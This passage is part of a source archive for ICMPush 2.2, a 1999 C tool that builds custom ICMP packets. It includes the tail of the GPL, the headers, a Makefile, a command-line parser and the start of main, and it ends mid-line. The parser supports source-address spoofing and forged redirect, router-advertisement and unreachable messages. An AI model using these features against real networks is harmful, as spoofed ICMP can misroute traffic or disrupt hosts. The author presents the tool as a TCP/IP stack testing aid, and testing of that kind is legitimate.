software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS Appendix: How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) 19yy This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) 19yy name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. , 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Library General Public License instead of this License. icmpush-2.2.orig/SITES0100644000175000017500000000015106664230654012727 0ustar domdom Primary site: - http://hispahack.ccc.de Secondary site: - http://packetstorm.genocide2600.com icmpush-2.2.orig/LICENSE0120777000175000017500000000000007160153064014146 2COPYINGustar domdomicmpush-2.2.orig/IMPORTANT0100644000175000017500000000072306633542175013422 0ustar domdom/***************************************************************************/ /* I released this program for evaluation of TCP/IP stacks *ONLY*. Take it */ /* like a little tool to improve your system security, not for cracking, */ /* disturbing or flooding another systems. This can be a crime on certain */ /* countries. */ /***************************************************************************/icmpush-2.2.orig/compat.h0100644000175000017500000001536206662417130013555 0ustar domdom/***************************************************************************/ /* COMPAT.H v1.8 */ /***************************************************************************/ #ifndef __MY_COMPAT_H__ #define __MY_COMPAT_H__ /* IPv4 packet header */ struct ip2 { #ifdef _BIT_FIELDS_LTOH u_char ip_hl:4, /* Longitud cabecera en grupos de 32 bits */ ip_v:4; /* Version de IP */ #else u_char ip_v:4, /* Version de IP */ ip_hl:4; /* Longitud cabecera en grupos de 32 bits */ #endif u_char ip_tos; /* Tipo de servicio */ short ip_len; /* Longitud total incluyendo datos */ u_short ip_id; /* Identificador paquete IP */ short ip_off; /* Offset si fragmentacion */ u_char ip_ttl; /* Time To Live */ u_char ip_p; /* Protocolo del campo de datos */ u_short ip_sum; /* Checksum */ struct in_addr ip_src, /* Origen */ ip_dst; /* Destino */ }; /* ICMP packet header */ struct icmp2 { struct icmp_hdr { u_char icmp_type; u_char icmp_code; u_short icmp_cksum; } icmp_hdr; union { u_char ih_pptr; struct in_addr ih_gwaddr; struct ih_idseq { n_short icd_id; n_short icd_seq; } ih_idseq; u_long ih_reserved; struct ih_rdiscovery { u_char num_addr; u_char addr_entry_size; u_short lifetime; } ih_rdiscovery; } icmp_hun; union { struct id_ts { n_time its_otime; n_time its_rtime; n_time its_ttime; } id_ts; struct id_ip { struct ip2 idi_ip; } id_ip; u_long id_mask; char id_data[1]; struct id_rdiscovery { struct in_addr router_addr; struct in_addr pref_level; } id_rdiscovery; } icmp_dun; }; #define icmp_type icmp_hdr.icmp_type #define icmp_code icmp_hdr.icmp_code #define icmp_cksum icmp_hdr.icmp_cksum #define icmp_pptr icmp_hun.ih_pptr #define icmp_gwaddr icmp_hun.ih_gwaddr #define icmp_id icmp_hun.ih_idseq.icd_id #define icmp_seq icmp_hun.ih_idseq.icd_seq #define icmp_reserved icmp_hun.ih_reserved #define icmp_num_addr icmp_hun.ih_rdiscovery.num_addr #define icmp_addr_entry_size icmp_hun.ih_rdiscovery.addr_entry_size #define icmp_lifetime icmp_hun.ih_rdiscovery.lifetime #define icmp_otime icmp_dun.id_ts.its_otime #define icmp_rtime icmp_dun.id_ts.its_rtime #define icmp_ttime icmp_dun.id_ts.its_ttime #define icmp_ip icmp_dun.id_ip.idi_ip #define icmp_mask icmp_dun.id_mask #define icmp_data icmp_dun.id_data #define icmp_rdiscovery icmp_dun.id_rdiscovery #define icmp_rdisc_router icmp_dun.id_rdiscovery.router_addr #define icmp_rdisc_pref icmp_dun.id_rdiscovery.pref_level /* UDP packet header */ struct udp_hdr { u_short source; /* Puerto origen */ u_short dest; /* Puerto destino */ short uh_ulen; /* Longitud */ u_short uh_sum; /* Checksum */ }; /* TCP packet header */ struct tcp_hdr { u_short source; /* Puerto origen */ u_short dest; /* Puerto destino */ u_long seq; /* Numero de secuencia */ }; /* ICMP ECHO packet header */ struct echo_hdr { u_char type; u_char code; u_short cksum; u_short id; u_short seq; }; /* ICMP error data field */ union data_hdr { struct tcp_hdr cab_tcp; struct udp_hdr cab_udp; struct echo_hdr cab_echo; }; #define TCAB_IP sizeof(struct ip2) #define TCAB_ICMP sizeof(struct icmp2) #define TCAB_UDP sizeof(struct udp_hdr) #define TCAB_TCP sizeof(struct tcp_hdr) #define TCAB_ECHO sizeof(struct echo_hdr) #define TCAB_ICMP_MSG TCAB_ECHO #define TCAB_64DATA sizeof(union data_hdr) #define TDATA_TIMESTAMP sizeof(struct id_ts) #define TDATA_ADDRESS sizeof(u_long) #define TCAB_RDISC sizeof(struct ih_rdiscovery) #define TDATA_RDISC sizeof(struct id_rdiscovery) /* ICMP errors ... */ #define ICMP_DEST_UNREACH 3 #define ICMP_SOURCE_QUENCH 4 #define ICMP_REDIRECT 5 #define ICMP_TIME_EXCEEDED 11 #define ICMP_PARAM_PROB 12 /* ICMP information messages ... */ #define ICMP_ECHO_REPLY 0 #define ICMP_ECHO_REQUEST 8 #define ICMP_ROUTER_ADVERT 9 #define ICMP_ROUTER_SOLICIT 10 #define ICMP_TIMESTAMP 13 #define ICMP_TIMESTAMP_REPLY 14 #define ICMP_INFO_REQUEST 15 #define ICMP_INFO_REPLY 16 #define ICMP_ADDRESS 17 #define ICMP_ADDRESS_REPLY 18 #define TTL_DFL 254 /* Time To Live default */ #define TIMEOUT_DFL 5 /* Timeout default, secs */ #ifdef SOLARIS /* Maximum packet size */ #define SIZE_BIG 65535 #else #define SIZE_BIG 75000 #endif #define LIFETIME_DFL 1800 /* Lifetime default of a Router Advertisement */ #define PREFERENCE_DFL 0 /* Preference default of a Router Advertisement*/ #define MAX_ROUTERS ( ( SIZE_BIG - TCAB_IP - sizeof(struct icmp_hdr) \ - TCAB_RDISC ) / TDATA_RDISC ) #define ICMP_ERROR 1 #define ICMP_INFO 0 #define ICMP_ERR_DFL_TOS 0 #define NO_REPLY 255 /* ICMP type that doesn't have a reply function */ #define IP_MF 0x2000 /* IP More Fragments flag */ #endificmpush-2.2.orig/mtu.h0100644000175000017500000000037106662420101013061 0ustar domdom#ifndef __MTU_H__ #define __MTU_H__ struct mi_ifaz { char ifaz_nombre[IFNAMSIZ]; short ifaz_flags; int ifaz_mtu; struct sockaddr ifaz_ip; }; #define MTU_DFL 1500 #endif icmpush-2.2.orig/Makefile0100644000175000017500000000367506662513776013602 0ustar domdom# # Makefile for ICMPush v2.2 # Tested on Linux 2.0.35, 2.2.1 (gcc v2.7.2.3) and Solaris 2.5.1 SPARC # (gcc v2.7.2.3) # # Compiler CC = gcc # Install directory INST_DIR = /usr/local/bin # English man directory MAN_DIR = /usr/local/man/man8 # Program Language. # If you need spanish uncomment the next variable, else other English. #LNG = -DSPANISH # Compiler flags CCFLAGS = -Wall -O3 $(LNG) # If you get problems with the message "undefined reference to __inet_aton" # you has replaced the original "includes" with the "includes" that # comes with the bind 8.1.2 distribution, then you must put the # complete path to the library. # Leave this variable blank else other. LIBBINDDIR = # LIBBINDIR = /usr/local/lib/libbind.a ###################################################################### # From here to the end is not necessary to modify. Thanx :) # LIBSOLARIS = -lsocket -lresolv -lnsl SOURCES = icmpush.c help.c version.c parser.c mtu.c OBJS = icmpush.o help.o version.o parser.o mtu.o default: @echo "" @echo " To compile the ICMPush program for Linuz:" @echo " make linuz" @echo "" @echo " To compile the ICMPush program for Solaris:" @echo " make solaris" @echo "" @echo " To delete object files, executables and *~:" @echo " make clean" @echo "" @echo " To install the ICMPush executable file and the man page:" @echo " make install" @echo "" @echo " Enjoy! ;)" @echo "" @echo " Slayer." linuz: icmp-lin cuenta-prog icmp-lin: $(CC) $(CCFLAGS) -DLINUX -D_BIT_FIELDS_LTOH -c $(SOURCES) $(CC) $(CCFLAGS) -o icmpush $(OBJS) $(LIBBINDDIR) cuenta-prog: $(CC) $(CCFLAGS) -c cuenta.c $(CC) $(CCFLAGS) -o cuenta cuenta.o solaris: icmp-sol cuenta-prog icmp-sol: $(CC) $(CCFLAGS) -DSOLARIS -c $(SOURCES) $(CC) $(CCFLAGS) -o icmpush $(OBJS) $(LIBBINDDIR) $(LIBSOLARIS) install: cp icmpush $(INST_DIR) cp icmpush.8 $(MAN_DIR) clean: @rm -f icmpush cuenta *.o *~ icmpush-2.2.orig/version.c0100644000175000017500000000017106663232712013744 0ustar domdom#ifdef SPANISH char *version="v2.2 por Slayer, 19/02/1999"; #else char *version="v2.2 by Slayer, 1999/02/19"; #endif icmpush-2.2.orig/parser.c0100644000175000017500000004207106663233770013565 0ustar domdom/********************************************************/ /* These are the functions that parse the command line */ /* arguments. */ /* The routers IP addresses of a Router Advertisement */ /* is implemented on a linked list. */ /********************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include "compat.h" #include "packet.h" #include "misc.h" #ifdef SOLARIS extern char *sys_errlist[]; #endif /******************/ /* ICMP codes ... */ /******************/ char *cod_redirect[]={ "net", "host", "serv-net", "serv-host", "max" }; char *cod_time[]={ "ttl", "frag", "max" }; char *cod_unreach[]={ "net-unreach", "host-unreach", "prot-unreach", "port-unreach", "frag-needed", "sroute-fail", "net-unknown", "host-unknown", "host-isolated", "net-ano", "host-ano", "net-unr-tos", "host-unr-tos", "com-admin-prohib", "host-precedence-viol", "precedence-cutoff", "max" }; /**********************/ /* ... end ICMP codes */ /**********************/ extern u_short is_pattern; extern u_short resolve; extern u_short verbose; extern u_short more_verbose; extern char *version; extern char *prog; char max_gbg = 0; /***************************/ /* Functions prototypes... */ /***************************/ void add_router(struct my_pack *, u_long, u_long ); int existe_host( char *, u_long * ); int existe_codigo( char *, char **, int ); void parsea_args( char **, struct my_pack * ); extern void salir( int ); extern void help( void ); #ifdef SOLARIS extern int inet_aton( char *, struct in_addr * ); #endif extern int get_iface_out( struct sockaddr_in *, struct sockaddr_in * ); void recorre_lista(struct my_pack *); /*******************************/ /* ...end functions prototypes */ /*******************************/ /************************/ /* Yeaaaaaaaahhh !! */ /* A parser function !! */ /************************/ void parsea_args( char **args, struct my_pack *packet ) { int max_cod=0, ptr; char *code_icmp="NOTHING", **array_aux=NULL, *punt, *router, *pref; char **aux_args = args; u_long router_addr, preference; struct sockaddr_in aux; struct protoent *proto; /**************************************/ /* This first nasty thing is looking */ /* for the verbose options. This */ /* makes the output more clear before */ /* parsing the rest of options. */ /* Ok, is'nt a good thing but it */ /* works. ;) */ /**************************************/ ++aux_args; while ( *aux_args != (char *)NULL ) { if ( !strcmp("-v", *aux_args) || !strcmp("--verbose",*aux_args) ) { verbose = 1; aux_args++; continue; } if ( !strcmp("-vv", *aux_args) || !strcmp("--more_verbose",*aux_args) ) { more_verbose = verbose = 1; break; } aux_args++; } /************************/ /* Here begins the true */ /* parser. :) */ /************************/ ++args; while ( *args != (char *)NULL ) { if ( !strcmp("-sp", *args) || !strcmp("--spoof", *args) ) { if ( *++args == NULL ) salir(11); if ( existe_host( *args, (u_long *)&(packet->ip_spoof) ) ) salir(11); args++; continue; } if ( !strcmp("-c", *args) || !strcmp("--code", *args) ) { if ( *++args == NULL ) salir(7); code_icmp = *args; args++; continue; } if ( !strcmp("-prot", *args) || !strcmp("--protocol",*args) ) { if ( *++args == NULL ) salir(14); if ( ( proto = getprotobyname( *args )) == NULL ) salir(14); packet->protocol = proto->p_proto; args++; continue; } if ( !strcmp("-psrc", *args) || !strcmp("--port_src",*args) ) { if ( *++args == NULL ) salir(19); packet->p_origen = atoi(*args); args++; continue; } if ( !strcmp("-pdst", *args) || !strcmp("--port_dest",*args) ) { if ( *++args == NULL ) salir(20); packet->p_destino = atoi(*args); args++; continue; } if ( !strcmp("-orig", *args) || !strcmp("--orig_host", *args) ) { if ( *++args == NULL ) salir(8); if ( existe_host( *args, (u_long *)&(packet->orig) ) ) salir(8); args++; continue; } if ( !strcmp("-h", *args) || !strcmp("--help", *args) ) { help(); } if ( !strcmp("-V",*args) || !strcmp("--version",*args) ) { fprintf(stdout, "%s %s\n", prog, version ); exit(0); } if ( !strcmp("-du",*args) || !strcmp("--dest_unreach",*args) ) { packet->tipo_icmp = ICMP_DEST_UNREACH; array_aux = cod_unreach; max_cod = MAX(cod_unreach); args++; continue; } if ( !strcmp("-sq", *args) || !strcmp("--src_quench",*args) ) { packet->tipo_icmp = ICMP_SOURCE_QUENCH; packet->cod_icmp = 0; args++; continue; } if ( !strcmp("-red", *args) || !strcmp("--redirect",*args) ) { packet->tipo_icmp = ICMP_REDIRECT; array_aux = cod_redirect; max_cod = MAX(cod_redirect); args++; continue; } if ( !strcmp("-tx", *args) || !strcmp("--time_exc",*args) ) { packet->tipo_icmp = ICMP_TIME_EXCEEDED; array_aux = cod_time; max_cod = MAX(cod_time); args++; continue; } if ( !strcmp("-tstamp", *args) || !strcmp("--timestamp",*args) ) { packet->tipo_icmp = ICMP_TIMESTAMP; packet->cod_icmp = 0; args++; continue; } if ( !strcmp("-mask", *args) || !strcmp("--mask_req",*args) ) { packet->tipo_icmp = ICMP_ADDRESS; packet->cod_icmp = 0; args++; continue; } if ( !strcmp("-info", *args) || !strcmp("--info_req",*args) ) { packet->tipo_icmp = ICMP_INFO_REQUEST; packet->cod_icmp = 0; args++; continue; } if ( !strcmp("-rts", *args) || !strcmp("--router_solicit",*args) ) { packet->tipo_icmp = ICMP_ROUTER_SOLICIT; packet->cod_icmp = 0; args++; continue; } if ( !strcmp("-rta", *args) || !strcmp("--router_advert",*args) ) { packet->tipo_icmp = ICMP_ROUTER_ADVERT; packet->cod_icmp = 0; if ( *++args == NULL ) salir(26); punt = *args; if ( ( router = strtok( punt, "/")) != NULL ) { if ( existe_host( router, (u_long *)&(router_addr) ) ) salir(26); if ( (pref = strtok( NULL, "/")) != NULL ) preference = atoi(pref); else preference = PREFERENCE_DFL; add_router( packet, router_addr, preference ); } else fprintf(stderr, "strtok() error -> %s\n", sys_errlist[errno]); args++; continue; } if ( !strcmp("-lt", *args) || !strcmp("--lifetime",*args) ) { if ( *++args == NULL ) salir(21); packet->lifetime = atoi(*args); args++; continue; } if ( !strcmp("-echo", *args) || !strcmp("--echo_req",*args) ) { packet->tipo_icmp = ICMP_ECHO_REQUEST; packet->cod_icmp = 0; args++; continue; } if ( !strcmp("-to", *args) || !strcmp("--timeout",*args) ) { if ( *++args == NULL ) salir(21); packet->timeout = atoi(*args); args++; continue; } if ( !strcmp("-gw", *args) || !strcmp("--gateway",*args) ) { if ( *++args == NULL ) salir(5); if ( existe_host( *args, (u_long *)&(packet->gway) ) ) salir(5); args++; continue; } if ( !strcmp("-dest", *args) || !strcmp("--route_dest",*args) ) { if ( *++args == NULL ) salir(6); if ( existe_host( *args, (u_long *)&(packet->dest_red) ) ) salir(6); args++; continue; } if ( !strcmp("-id", *args) || !strcmp("--echo_id",*args) ) { if ( *++args == NULL ) salir(22); packet->p_origen = atoi(*args); args++; continue; } if ( !strcmp("-seq", *args) || !strcmp("--echo_seq",*args) ) { if ( *++args == NULL ) salir(23); packet->p_destino = atoi(*args); args++; continue; } if ( !strcmp("-pat", *args) || !strcmp("--pattern",*args) ) { if ( *++args == NULL ) salir(24); packet->pattern = *args; is_pattern = !is_pattern; packet->size_pattern = strlen(*args); if ( packet->size_pattern > ( SIZE_BIG - TCAB_IP - TCAB_ICMP_MSG ) ) salir(18); // Data 2 big :) args++; continue; } if ( !strcmp("-gbg", *args) || !strcmp("--garbage",*args) ) { if ( *++args == NULL ) salir(27); if ( !strcmp("max", *args) ) { packet->garbage = SIZE_BIG; max_gbg = 1; } else packet->garbage = (u_long)atol(*args); args++; continue; } if ( !strcmp("-param", *args) || !strcmp("--param_problem",*args) ) { packet->tipo_icmp = ICMP_PARAM_PROB; packet->cod_icmp = 0; args++; continue; } if ( !strcmp("-ptr", *args) || !strcmp("--pointer",*args) ) { if ( *++args == NULL ) salir(28); if ( (ptr = atoi(*args)) > 255 ) salir(28); if ( ptr < 0 ) salir(28); packet->pointer = ptr; args++; continue; } if ( !strcmp("-n", *args) || !strcmp("--no_resolve",*args) ) { resolve = 0; args++; continue; } if ( !strcmp("-v", *args) || !strcmp("--verbose",*args) ) { args++; continue; } if ( !strcmp("-vv", *args) || !strcmp("--more_verbose",*args) ) { args++; continue; } if ( *(args+1) == NULL ) { if ( packet->tipo_icmp == 255 ) /* Bad icmp type... */ salir(4); if ( existe_host( *args, (u_long *)&(packet->destino.sin_addr.s_addr) ) ) salir(13); break; } if ( verbose ) #ifdef SPANISH fprintf(stdout,"¿Qué c*j*n*s es esto? -> %s\n", *args); #else fprintf(stdout,"What the hell is it? -> %s\n", *args); #endif args++; } /* End while (args) */ if ( more_verbose ) recorre_lista(packet); if ( packet->destino.sin_addr.s_addr == 1 ) /* Bad destination host...*/ salir(13); if ( packet->tipo_icmp == 255 ) /* Bad icmp type... */ salir(4); if ( packet->ip_spoof == 0 ) { if ( !get_iface_out( (struct sockaddr_in *)&packet->destino, (struct sockaddr_in *)&aux ) ) packet->ip_spoof = aux.sin_addr.s_addr; } switch ( packet->tipo_icmp ) { case ICMP_REDIRECT: if ( (packet->cod_icmp = existe_codigo(code_icmp, array_aux, max_cod)) == -1 ) salir(7); if ( packet->dest_red == 1 ) salir(6); if ( packet->gway == 1 ) packet->gway = packet->ip_spoof; if (packet->orig == 1 ) packet->orig = packet->destino.sin_addr.s_addr; break; case ICMP_DEST_UNREACH:if( (packet->cod_icmp = existe_codigo(code_icmp, array_aux, max_cod)) == -1 ) salir(7); break; case ICMP_TIME_EXCEEDED:if( (packet->cod_icmp = existe_codigo(code_icmp, array_aux, max_cod)) == -1 ) salir(7); break; case ICMP_ROUTER_ADVERT: packet->timeout = 0; default: packet->cod_icmp = (strcmp(code_icmp,"NOTHING")?atoi(code_icmp):0); break; } if ( packet->orig == 1 ) packet->orig = packet->ip_spoof; } /******************************/ /* Add a router to the linked */ /* list of Advertisements */ /* entries. :) */ /******************************/ void add_router(struct my_pack *init, u_long router_addr, u_long preference) { struct router *cursor = init->router; if ( init->router == NULL ) { init->router = (struct router *)malloc(sizeof(struct router)); if ( init->router == NULL ) { fprintf(stderr, "Malloc error -> %s\n", sys_errlist[errno]); exit(0); } init->num_routers++; init->router->address = router_addr; init->router->pref = preference; init->router->next = NULL; return; } do { if ( !cursor->next ) { if ( init->num_routers == (MAX_ROUTERS - 1)) { if ( verbose ) fprintf(stdout, "Sorry, no more than %d routers allowed.\n", MAX_ROUTERS - 1); return; } cursor->next = (struct router *)malloc(sizeof(struct router)); if (!cursor) { fprintf(stderr, "Malloc error -> %s\n", sys_errlist[errno]); return; } init->num_routers++; cursor->next->address = router_addr; cursor->next->pref = preference; cursor->next->next = NULL; return; } cursor = cursor->next; }while ( cursor ); } /**********************/ /* For debug only ... */ /**********************/ void recorre_lista(struct my_pack *init ) { struct router *cursor = init->router; struct in_addr direc; while(cursor) { direc.s_addr = cursor->address; fprintf(stdout, " -> Router = %s - Pref = %ld\n", inet_ntoa(direc), cursor->pref); cursor = cursor->next; } } /************************************/ /* Look for the code of the ICMP */ /* type within the array_cod. */ /* Return -1 on error. */ /* Return the code value on success */ /************************************/ int existe_codigo( char *cod, char **array_cod, int max_cod ) { short int bucle; for (bucle=0; bucle <= (max_cod-1); bucle++) if ( !strcmp( cod, array_cod[bucle]) ) return bucle; return -1; } /********************************************/ /* If nom_host == NULL then we want to know */ /* if the IP (in binary format) is ok. */ /* If nom_host != NULL then we put the */ /* IP of nom_host into bin_host. */ /* Return 1 on error, 0 on succes. */ /********************************************/ /* We allow the 255.255.255.255 address !! */ /********************************************/ int existe_host( char *nom_host, u_long *bin_host ) { struct hostent *hinfo; struct sockaddr_in host_tmp; struct in_addr host_binario; iniciamem( (char *)&host_tmp, sizeof(host_tmp) ); iniciamem( (char *)&host_binario, sizeof(host_binario) ); host_tmp.sin_family = AF_INET; if ( nom_host == NULL ) /* We wanna know if the binary IP is OK. */ { if ( (hinfo = gethostbyaddr( (char *)bin_host, 4, AF_INET )) ) return 0; else return 1; } if ( inet_aton( nom_host, &host_binario) ) { copymem( (char *)&host_binario, (char *)bin_host, sizeof(host_binario)); return 0; } if ( (hinfo = gethostbyname( nom_host )) ) /* Put nom_host into bin_host */ { copymem(hinfo->h_addr, (char *)&host_tmp.sin_addr, hinfo->h_length); copymem( (char *) &host_tmp.sin_addr.s_addr, (char *)bin_host, sizeof( host_tmp.sin_addr.s_addr)); return 0; } return 1; } icmpush-2.2.orig/BUGS0100644000175000017500000000012306657376617012613 0ustar domdomYes! There are many bugs! :D Plz, send your bugs to: tcpbgp@softhome.net tnx.icmpush-2.2.orig/icmpush.c0100644000175000017500000010266006662505305013735 0ustar domdom/***************************************************************************/ /* I C M P U S H . C v2.2 */ /***************************************************************************/ /* - Program that allow to send the following ICMP packets fully */ /* customized: */ /* a) ICMP errors: */ /* - Redirect. */ /* - Source Quench. */ /* - Time Exceeded. */ /* - Destination Unreach. */ /* - Parameter Problem. */ /* b) ICMP information: */ /* - Address Mask Request. */ /* - Timestamp. */ /* - Information Request. */ /* - Echo Request. */ /* - Router Solicitation (Router Discovery). */ /* - Router Advertisement (Router Discovery). */ /***************************************************************************/ /* Copyright (C) 1999 Slayer (tcpbgp@softhome.net) */ /* This program is free software; you can redistribute it and/or modify */ /* it under the terms of the GNU General Public License as published by */ /* the Free Software Foundation; either version 2 of the License, or */ /* (at your option) any later version. */ /* This program is distributed in the hope that it will be useful, */ /* but WITHOUT ANY WARRANTY; without even the implied warranty of */ /* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the */ /* GNU General Public License for more details. */ /* You should have received a copy of the GNU General Public License */ /* along with this program; if not, write to the Free Software */ /* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. */ /***************************************************************************/ /* echo "Ideas & comments" | /bin/mail tcpbgp@softhome.net */ /* echo "Destructive opinions & flames" >> /dev/null */ /* sorry for the bad english. :) */ /***************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "compat.h" #include "misc.h" #include "packet.h" #include "err_msg.h" #ifdef SPANISH #define LNG 0 #else #define LNG 1 #endif /************************/ /* Global variables ... */ /************************/ extern char *version; extern char max_gbg; char *prog; u_short verbose = 0; u_short more_verbose = 0; u_short is_pattern = 0; u_short resolve = 1; /****************************/ /* ... end global variables */ /****************************/ #ifdef SOLARIS extern char *sys_errlist[]; #endif #define LINE fprintf(stdout, \ "-----------------------------------------------------\n") /***************************/ /* Functions prototypes... */ /***************************/ void adjust_sock( int ); int envia_icmp_err( char *, struct my_pack * ); int envia_icmp_info( char *, struct my_pack *, u_short, u_short ); int add_garbage( char *, u_long, int ); void fill_garbage( char *, u_long ); void put_routers( struct my_pack *, struct id_rdiscovery * ); void envia_ip( int, u_long, struct sockaddr_in *, int, int, int, int, u_char *); void send2sock( int, char *, int, struct sockaddr * ); void dont_print( struct in_addr, struct icmp2 * ); void print_info_reply( struct in_addr, struct icmp2 * ); void print_timestamp_reply( struct in_addr, struct icmp2 * ); void print_address_reply( struct in_addr, struct icmp2 * ); void print_router_reply( struct in_addr, struct icmp2 * ); void print_echo_reply( struct in_addr, struct icmp2 * ); void proto_tcp64( union data_hdr *, u_short, u_short ); void proto_udp64( union data_hdr *, u_short, u_short ); void proto_icmp64( union data_hdr *, u_short, u_short ); void read_icmp( int, char *, int ); void print_pack( char *, int, u_char, u_char, u_short, u_short ); void print_err_pack ( struct icmp2 * ); int in_cksum( u_short *, int ); char *pasa( struct sockaddr_in * ); u_long day2milisecs( void ); void salir( int ); void salir_con_error( int ); void help( void ); void timeout_func( int ); void init_packet_struct( struct my_pack * ); extern void parsea_args( char **, struct my_pack * ); #ifdef SOLARIS extern long random(); extern int srandom( unsigned); #else extern int get_mtu( struct sockaddr_in * ); #endif /*******************************/ /* ...end functions prototypes */ /*******************************/ /*************************/ /* ICMP types handler... */ /*************************/ struct icmp_class { char *name; int class; int reply; void (*print_packet)( struct in_addr, struct icmp2 *); } icmp_info_or_err[]= { { "Echo Reply", ICMP_INFO, NO_REPLY, print_echo_reply }, { "Not implemented", 0, NO_REPLY, dont_print }, { "Not implemented", 0, NO_REPLY, dont_print }, { "Destination Unreach", ICMP_ERROR, NO_REPLY, dont_print }, { "Source Quench", ICMP_ERROR, NO_REPLY, dont_print }, { "Redirect", ICMP_ERROR, NO_REPLY, dont_print }, { "Not implemented", 0, NO_REPLY, dont_print }, { "Not implemented", 0, NO_REPLY, dont_print }, { "Echo Request", ICMP_INFO, ICMP_ECHO_REPLY, dont_print }, { "Router Advertisement", ICMP_INFO, NO_REPLY, print_router_reply }, { "Router Solicitation", ICMP_INFO, ICMP_ROUTER_ADVERT, dont_print }, { "Time Exceeded", ICMP_ERROR, NO_REPLY, dont_print }, { "Parameter Problem", ICMP_ERROR, NO_REPLY, dont_print }, { "Timestamp Request", ICMP_INFO, ICMP_TIMESTAMP_REPLY, dont_print }, { "Timestamp Reply", ICMP_INFO, NO_REPLY, print_timestamp_reply }, { "Info Request", ICMP_INFO, ICMP_INFO_REPLY, dont_print }, { "Info Reply", ICMP_INFO, NO_REPLY, print_info_reply }, { "Address Mask Request", ICMP_INFO, ICMP_ADDRESS_REPLY, dont_print }, { "Address Mask Reply", ICMP_INFO, NO_REPLY, print_address_reply } }; /***********************************/ /* Access to 64 bits protocol data */ /* to build an ICMP error packet. */ /***********************************/ struct protocols { int proto; void (*func_proto)( union data_hdr *, u_short, u_short ); } data_protocols[] = { { IPPROTO_TCP, proto_tcp64 }, { IPPROTO_UDP, proto_udp64 }, { IPPROTO_ICMP, proto_icmp64 } }; /*******************************/ /* Initial function. */ /* Make the socket and buffers */ /*******************************/ int main(int argc, char **argv) { char buf[SIZE_BIG]; int sock, tam_icmp; u_short proc_id; struct protoent *proto; struct my_pack packet; iniciamem( buf, sizeof(buf) ); prog = argv[0]; proc_id = getpid(); if ( argc == 1 ) { fprintf(stdout,"%s %s\n", prog, version); #ifdef SPANISH fprintf(stdout,"Ejecuta '%s -h' para ver la ayuda.\n",prog); #else fprintf(stdout,"Try '%s -h' to display the help.\n",prog); #endif exit(0); } init_packet_struct( (struct my_pack 